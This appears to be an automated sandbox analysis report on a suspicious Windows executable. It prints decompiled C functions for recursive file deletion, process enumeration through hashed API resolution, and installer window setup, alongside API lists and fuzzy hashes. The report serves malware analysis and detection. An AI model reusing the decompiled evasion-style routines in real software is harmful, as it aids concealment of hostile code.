0x70481aa3
0x70481aa6
0x70481aa9
0x70481aac
0x70481aaf
0x70481ab2
0x70481ab4
0x70481ab7
0x70481aba
0x70481abf
0x70481ac2
0x70481aca
0x70481ad2
0x70481ad4
0x70481ad7
0x70481adf
0x70481adf
0x70481ae4
0x70481ae7
0x00000000
0x00000000
0x70481af1
0x70481af3
0x70481af8
0x70481afa
0x70481b8b
0x70481b8b
0x70481b8b
0x70481b8f
0x70481b92
0x70481b94
0x70481bb6
0x70481bb9
0x70481bbb
0x70481bc4
0x70481bca
0x70481bcc
0x70481bd2
0x70481bd2
0x70481bd8
0x70481bdb
0x70481bdb
0x70481bde
0x70481bde
0x70481be4
0x70481be6
0x70481be9
0x70481bef
0x70481bf2
0x70481bf2
0x70481bf4
0x70481bfa
0x70481bfd
0x70481c21
0x70481c24
0x00000000
0x00000000
0x70481c27
0x70481c29
0x70481c37
0x70481c3a
0x70481c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x70481c3e
0x70481c3e
0x70481c3e
0x70481c44
0x70481c46
0x00000000
0x00000000
0x70481c48
0x70481c4a
0x70481c4c
0x70481c4e
0x00000000
0x00000000
0x00000000
0x70481c4e
0x70481c50
0x70481c52
0x70481c54
0x70481c54
0x70481c5a
0x70481c60
0x70481c62
0x70481c76
0x70481c76
0x70481c78
0x70481c64
0x70481c6a
0x70481c6d
0x70481c6d
0x00000000
0x70481bff
0x70481bff
0x70481bff
0x70481c00
0x70481c08
0x70481c0c
0x70481c12
0x70481c16
0x00000000
0x70481c16
0x70481c02
0x70481c02
0x70481c03
0x00000000
0x00000000
0x70481c05
0x70481c06
0x00000000
0x00000000
0x00000000
0x70481c06
0x70481b96
0x70481b97
0x70481ba0
0x70481ba3
0x70481bb0
0x70481bb0
0x70481ba5
0x70481ba5
0x70481c7e
0x70481c81
0x70481c84
0x70481cf6
0x70481cfa
0x70481adc
0x00000000
0x70481adc
0x00000000
0x70481cfa
0x70481b94
0x70481b00
0x70481b03
0x70481b66
0x70481b69
0x70481b7a
0x70481b7a
0x70481b7d
0x70481c89
0x70481c8c
0x70481c8c
0x70481c8e
0x70482033
0x70482045
0x70482045
0x70482047
0x00000000
0x00000000
0x70482037
0x70482038
0x7048203b
0x7048203e
0x704820ba
0x704820c1
0x704820c6
0x704820c9
0x70481cf2
0x70481cf2
0x70481cf2
0x70481cf3
0x00000000
0x70481cf3
0x70482040
0x70482042
0x70482042
0x70482049
0x7048204b
0x704820ae
0x70481ce7
0x70481cea
0x70481ced
0x70481cf0
0x70481cf0
0x00000000
0x70481cf0
0x7048204d
0x7048204f
0x70482055
0x70482055
0x70482057
0x7048205a
0x7048206d
0x7048206d
0x70482070
0x70482073
0x00000000
0x00000000
0x70482075
0x70482078
0x00000000
0x00000000
0x7048207a
0x70482081
0x70482081
0x70482087
0x7048208a
0x704820a6
0x7048208c
0x70482095
0x70482098
0x70482098
0x00000000
0x7048208a
0x7048205c
0x7048205f
0x70482062
0x00000000
0x00000000
0x70482064
0x00000000
0x70482064
0x70482051
0x70482053
0x00000000
0x00000000
0x00000000
0x70482053
0x70481c94
0x70481c94
0x70481c95
0x70481dde
0x70481dde
0x70481de5
0x70481de8
0x00000000
0x00000000
0x70481df5
0x00000000
0x70481fdb
0x70481fde
0x70481fe1
0x70481fe1
0x70481fe2
0x70481fe5
0x70481fe7
0x70481fe9
0x00000000
0x00000000
0x70481feb
0x70481feb
0x70481fee
0x70482000
0x70482003
0x70482006
0x7048200c
0x00000000
0x7048200c
0x70481ff0
0x70481ff0
0x70481ff2
0x00000000
0x00000000
0x70481ff4
0x70481ff6
0x70481ff8
0x70481ff8
0x70481ff8
0x70481ff9
0x70481ffb
0x70481ffd
0x70481fe1
0x70481fe2
0x70481fe5
0x70481fe7
0x70481fe9
0x00000000
0x00000000
0x00000000
0x70481fe9
0x00000000
0x70481e3c
0x00000000
0x00000000
0x70481e48
0x00000000
0x00000000
0x70481e2f
0x70481e33
0x70481e37
0x00000000
0x00000000
0x70481fad
0x70481fb1
0x00000000
0x00000000
0x70481fb7
0x70481fbf
0x70481fc6
0x70481fce
0x00000000
0x00000000
0x70481f15
0x70481f15
0x00000000
0x00000000
0x70481e51
0x00000000
0x00000000
0x7048202b
0x00000000
0x00000000
0x70481f1d
0x70481f1f
0x70481f1f
0x00000000
0x00000000
0x7048201b
0x00000000
0x00000000
0x7048201f
0x00000000
0x00000000
0x70482027
0x00000000
0x00000000
0x70481f64
0x70481f66
0x70481f66
0x00000000
0x00000000
0x70481f2f
0x70481f31
0x70481f31
0x00000000
0x00000000
0x70481f41
0x70481f43
0x70481f43
0x00000000
0x00000000
0x70481f72
0x70481f74
0x70481f74
0x00000000
0x00000000
0x70481f4c
0x70481f4e
0x70481f4e
0x00000000
0x00000000
0x70481f53
0x00000000
0x00000000
0x70482023
0x7048202d
0x7048202d
0x00000000
0x00000000
0x70481f7d
0x70481f81
0x70481f86
0x70481f89
0x70481f8a
0x70481f8d
0x70481f93
0x70481f93
0x00000000
0x00000000
0x70482013
0x00000000
0x00000000
0x70481f57
0x70481f57
0x00000000
0x00000000
0x70481e58
0x70481e58
0x00000000
0x00000000
0x70481f6b
0x70481f6d
0x70481f6d
0x00000000
0x00000000
0x70481dfc
0x70481e02
0x70481e05
0x70481e07
0x70481e07
0x70481e0a
0x70481e0e
0x70481e1b
0x70481e1d
0x70481e23
0x70481e23
0x70481e23
0x00000000
0x00000000
0x70481f20
0x70481f20
0x70481f22
0x70481f29
0x00000000
0x00000000
0x70481f67
0x70481f67
0x00000000
0x00000000
0x70481f32
0x70481f32
0x70481f34
0x70481f3b
0x00000000
0x00000000
0x70481f44
0x70481f44
0x70481f46
0x00000000
0x00000000
0x70481f75
0x70481f75
0x00000000
0x00000000
0x70481f4f
0x70481f4f
0x00000000
0x00000000
0x70481f9b
0x70481f9f
0x70481fa4
0x70481fa7
0x00000000
0x00000000
0x70481f59
0x70481f59
0x70481f5c
0x70481f5e
0x00000000
0x00000000
0x70481f6e
0x70481f6e
0x70481f77
0x70481f77
0x70481e5a
0x70481e5a
0x70481e5d
0x70481e64
0x70481e66
0x70481e68
0x70481e6f
0x70481e72
0x70481e77
0x70481e79
0x70481e7b
0x70481e7f
0x70481e85
0x70481e8b
0x70481e8b
0x70481e8d
0x70481e8d
0x70481e8e
0x70481e8e
0x70481e92
0x70481e98
0x70481e9a
0x70481e9e
0x70481ea3
0x70481ea3
0x70481ea5
0x70481ea5
0x70481ea8
0x70481eab
0x70481eb4
0x70481eb7
0x70481eba
0x70481eba
0x70481ebc
0x70481ebf
0x70481ec5
0x70481ecb
0x70481ecb
0x70481ecd
0x00000000
0x00000000
0x70481ed3
0x70481ed3
0x70481ed7
0x70481ede
0x70481f02
0x70481f02
0x70481f06
0x70481f08
0x70481f0b
0x70481f0b
0x70481f0e
0x70481f0e
0x00000000
0x70481f06
0x70481ee3
0x70481ee6
0x70481ee6
0x70481eed
0x70481eef
0x70481ef2
0x70481ef9
0x70481efa
0x70481f00
0x70481f00
0x00000000
0x70481f00
0x70481ef4
0x70481ef7
0x00000000
0x00000000
0x00000000
0x70481ef7
0x70481e87
0x70481e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70481df5
0x70481c9b
0x70481c9b
0x70481c9c
0x70481ddb
0x00000000
0x70481ddb
0x70481ca2
0x70481ca3
0x00000000
0x00000000
0x70481ca9
0x70481cac
0x70481da0
0x70481da0
0x70481da3
0x70481db8
0x70481dba
0x70481dba
0x70481dbb
0x70481dbe
0x70481dc1
0x70481dcd
0x70481dcd
0x70481dcd
0x70481dc3
0x70481dc3
0x70481dc3
0x70481dd3
0x00000000
0x70481dd3
0x70481da5
0x70481da5
0x70481da6
0x70481db4
0x00000000
0x70481db4
0x70481da9
0x70481daa
0x00000000
0x00000000
0x70481db0
0x00000000
0x70481db0
0x70481cb2
0x70481d9c
0x00000000
0x70481d9c
0x70481cb8
0x70481cb8
0x70481cbb
0x70481ce4
0x00000000
0x70481ce4
0x70481cbd
0x70481cbd
0x70481cc0
0x70481cda
0x00000000
0x70481cda
0x70481cc2
0x70481cc2
0x70481cc5
0x70481cd4
0x00000000
0x70481cd4
0x70481cc8
0x70481cc9
0x00000000
0x00000000
0x70481ccb
0x00000000
0x70481b83
0x70481b83
0x70481b86
0x00000000
0x70481b86
0x70481b7d
0x70481b6b
0x70481b6f
0x00000000
0x00000000
0x70481b71
0x70481b74
0x00000000
0x00000000
0x00000000
0x70481b74
0x70481b05
0x70481b08
0x70481b3e
0x70481b41
0x00000000
0x70481b47
0x70481b49
0x70481b4d
0x70481b54
0x70481b5b
0x70481b5e
0x70481b61
0x00000000
0x70481b61
0x70481b41
0x70481b0a
0x70481b0b
0x70481b26
0x70481b29
0x00000000
0x70481b2f
0x70481b2f
0x70481b36
0x70481b39
0x00000000
0x70481b39
0x70481b29
0x70481b10
0x00000000
0x70481b16
0x70481b16
0x70481b1d
0x00000000
0x70481b1d
0x70481b10
0x70481d09
0x70481d0e
0x70481d13
0x70481d17
0x704821c6
0x704821cc
0x70481d29
0x70481d2b
0x70481d2c
0x704820f1
0x704820f1
0x704820f4
0x704820f7
0x70482114
0x7048211a
0x7048211c
0x70482122
0x70482139
0x70482139
0x70482139
0x70482146
0x7048214c
0x7048214f
0x70482155
0x70482157
0x7048215a
0x7048215c
0x70482163
0x70482168
0x7048216b
0x7048216d
0x70482172
0x70482184
0x70482184
0x70482172
0x7048216b
0x7048215a
0x7048218a
0x7048218d
0x70482197
0x7048219f
0x704821ab
0x704821b1
0x704821b4
0x704820e6
0x704820e6
0x00000000
0x704820e6
0x704821ba
0x704821c0
0x704821c0
0x00000000
0x00000000
0x704821c2
0x704821c2
0x704821c2
0x704821c2
0x00000000
0x7048218f
0x7048218f
0x70482195
0x00000000
0x00000000
0x00000000
0x70482195
0x7048218d
0x70482125
0x7048212b
0x7048212d
0x70482133
0x00000000
0x00000000
0x00000000
0x70482133
0x704820f9
0x70482100
0x70482106
0x7048210c
0x00000000
0x7048210c
0x70481d32
0x70481d33
0x704820d0
0x704820d0
0x704820d6
0x704820d9
0x00000000
0x00000000
0x704820e0
0x704820e5
0x00000000
0x704820e5
0x70481d3a
0x00000000
0x00000000
0x70481d40
0x70481d40
0x70481d49
0x70481d4e
0x70481d54
0x00000000
0x00000000
0x70481d5a
0x70481d67
0x70481d6d
0x70481d77
0x70481d7d
0x70481d85
0x70481d95
0x00000000
0x70481d95

APIs

Part of subcall function 70481215: GlobalAlloc.KERNEL32(00000040,70481233,?,704812CF,-7048404B,704811AB,-000000A0), ref: 7048121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70481BC4
lstrcpyA.KERNEL32(00000008,?), ref: 70481C0C
lstrcpyA.KERNEL32(00000408,?), ref: 70481C16
GlobalFree.KERNEL32 ref: 70481C29
GlobalFree.KERNEL32 ref: 70481D09
GlobalFree.KERNEL32 ref: 70481D0E
GlobalFree.KERNEL32 ref: 70481D13
GlobalFree.KERNEL32 ref: 70481EFA
lstrcpyA.KERNEL32(?,?), ref: 70482098
GetModuleHandleA.KERNELBASE(00000008), ref: 70482114
LoadLibraryA.KERNELBASE(00000008), ref: 70482125
GetProcAddress.KERNEL32(?,?), ref: 7048217E
lstrlenA.KERNEL32(00000408), ref: 70482198

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: d74b2cc3509f4a7b711d7bec4f92bae95c28640d33c84deccd988725135467de
Instruction ID: c0c4960d9df168e15ee149ff7f1e028bf70ed7ca063302a8f4088f3ddcbb9b16
Opcode Fuzzy Hash: d74b2cc3509f4a7b711d7bec4f92bae95c28640d33c84deccd988725135467de
Instruction Fuzzy Hash: 61229B71D04249DFCB128FA4C9847ADBBF9BB05305F204D2FD696A23E0D7786A82DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405a1f
0x00405a24
0x00405a2d
0x00405a30
0x00405a38
0x00405a3b
0x00405a3e
0x00405a46
0x00405a48
0x00405a49
0x00000000
0x00405a49
0x00405a54
0x00405a57
0x00405a57
0x00405a57
0x00405a5b
0x00405a6e
0x00405a75
0x00405a7a
0x00405a7e
0x00405a8e
0x00405a80
0x00405a86
0x00405a86
0x00405a93
0x00405a96
0x00405aa1
0x00405aa7
0x00405aac
0x00405abc
0x00405abe
0x00405ac4
0x00405ac7
0x00405aca
0x00405b82
0x00405b82
0x00405b86
0x00405b88
0x00405b88
0x00405b88
0x00405b88
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ad0
0x00405ad0
0x00405ad9
0x00405adf
0x00405ae4
0x00405ae7
0x00405ae9
0x00405aed
0x00405aef
0x00405aef
0x00405aed
0x00405af2
0x00405af5
0x00405b08
0x00405b0a
0x00405b0f
0x00405b16
0x00405b31
0x00405b36
0x00405b38
0x00405b5c
0x00405b3a
0x00405b3a
0x00405b3d
0x00405b51
0x00405b3f
0x00405b42
0x00405b4a
0x00405b4a
0x00405b3d
0x00405b18
0x00405b1e
0x00405b20
0x00405b26
0x00405b26
0x00405b20
0x00000000
0x00405b16
0x00405af7
0x00405afa
0x00405afc
0x00000000
0x00000000
0x00405afe
0x00405b00
0x00000000
0x00000000
0x00405b02
0x00405b06
0x00000000
0x00000000
0x00000000
0x00405b61
0x00405b6b
0x00405b71
0x00405b71
0x00405b7c
0x00000000
0x00405b7c
0x00405a98
0x00405a9f
0x00000000
0x00000000
0x00000000
0x00405a5d
0x00405a5d
0x00405a5f
0x00405b8c
0x00405b8e
0x00405b91
0x00405be2
0x00405be2
0x00405be2
0x00405b93
0x00405b96
0x00405ba1
0x00405ba6
0x00405ba8
0x00000000
0x00000000
0x00405bab
0x00405bb7
0x00405bbc
0x00405bbe
0x00000000
0x00405bd9
0x00405bc0
0x00405bc3
0x00000000
0x00000000
0x00405bc8
0x00000000
0x00405bcf
0x00405b98
0x00405b98
0x00000000
0x00405b98
0x00405a65
0x00405a68
0x00000000
0x00000000
0x00000000
0x00405a68

APIs

DeleteFileA.KERNELBASE(?,?,74B5FA90,74B5F560,00000000), ref: 00405A3E
lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405A86
lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AA7
lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AAD
FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405ABE
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
FindClose.KERNEL32(00000000), ref: 00405B7C

Strings

\*.*, xrefs: 00405A80
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00405A15

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $\*.*
API String ID: 2035342205-4271560472
Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69

Uniqueness

Uniqueness Score: -1.00%

Function 703C4243, Relevance: 4.6, APIs: 3, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E703C4243(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E703C45AA();
				_v16 = E703C4652(_v8, 0xea31d3b6);
				_v20 = E703C4652(_v8, 0x5c7bf6e9);
				_v24 = E703C4652(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E703C41FF( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x703c4251
0x703c4261
0x703c4271
0x703c4281
0x703c428b
0x703c4292
0x703c4298
0x703c42a2
0x703c42ac
0x703c42b1
0x703c42b7
0x703c42dc
0x00000000
0x00000000
0x00000000
0x703c42de
0x00000000
0x703c42ca
0x00000000
0x703c42b3
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 703C4288
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 703C42AC

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction ID: 5a3b4cb2c9949d0bd35ca36518613eec542b9ff6d7853bb8ef31a0e40d4bc6d9
Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction Fuzzy Hash: D5111834D10119AEEB11DFB0CC4ABAEBBBAEF04340F1049A5F925E5194E7B0DE519A51

Uniqueness

Uniqueness Score: -1.00%

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}

0x004065cc
0x004065d5
0x00000000
0x004065e2
0x004065d8
0x00000000

APIs

FindFirstFileA.KERNELBASE(74B5FA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560), ref: 004065CC
FindClose.KERNEL32(00000000), ref: 004065D8

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a66
0x00403a6f
